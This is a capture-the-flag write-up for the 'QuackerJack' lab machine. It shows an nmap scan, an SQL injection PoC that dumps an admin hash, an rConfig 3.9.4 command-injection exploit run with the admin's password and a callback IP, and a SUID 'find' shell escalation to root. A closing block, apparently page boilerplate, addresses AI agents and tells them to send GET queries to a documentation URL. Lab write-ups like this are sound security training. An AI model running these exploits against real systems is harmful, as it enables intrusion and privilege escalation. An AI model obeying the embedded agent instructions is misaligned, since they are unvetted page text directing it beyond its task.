# QuackerJack
## Gaining Access
Nmap scan:
```
$ nmap -p- --min-rate 3000 192.168.233.57
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-30 16:48 +08
Nmap scan report for 192.168.233.57
Host is up (0.17s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
8081/tcp open blackice-icecap
```
### FTP Anonymous Fail
The FTP service does allow anonymous logins, but it just hangs:
```
$ ftp 192.168.233.57
Connected to 192.168.233.57.
220 (vsFTPd 3.0.2)
Name (192.168.233.57:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||32438|).
```
Nothing much there.
### SQL Injection -> RCE
Port 8081 was hosting an `rConfig` instance:
This version was vulnerable to a few exploits:
```
$ searchsploit rConfig 3.9.4
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
rConfig 3.9.4 - 'search.crud.php' Remote Command Injection | php/webapps/48241.py
rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote | php/webapps/48261.py
----------------------------------------------------------- ---------------------------------
```
The bottom one just didn't work, while the top one requires credentials to work. There a few other exploits that I found online, such as an SQL Injection here:
{% embed url="" %}
The above exploit was tested on Version 3.9.4, so it should work.
```
$ python3 sql.py https://192.168.233.57:8081
rconfig 3.9 - SQL Injection PoC
[+] Triggering the payloads on https://192.168.233.57:8081/commands.inc.php
[+] Extracting the current DB name :
rconfig
[+] Extracting 10 first users :
admin:1:dc40b85276a1f4d7cb35f154236aa1b2
```
The above hash is crackable on CrackStation.
We can then run the RCE exploit `48241.py`:
```
$ python3 48241.py https://192.168.233.57:8081 admin abgrtyu 192.168.45.161 21
```
We can then grab the user flag.
## Privilege Escalation
### Find SUID -> Root Shell
We can enumerate for SUID binaries on this machine:
```
bash-4.2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/find
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/fusermount
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
```
We can run `find` as the `root` user. Following GTFOBins, we just need to run this:
```
./find . -exec /bin/sh -p \; -quit
```
Rooted!
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/linux/quackerjack.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.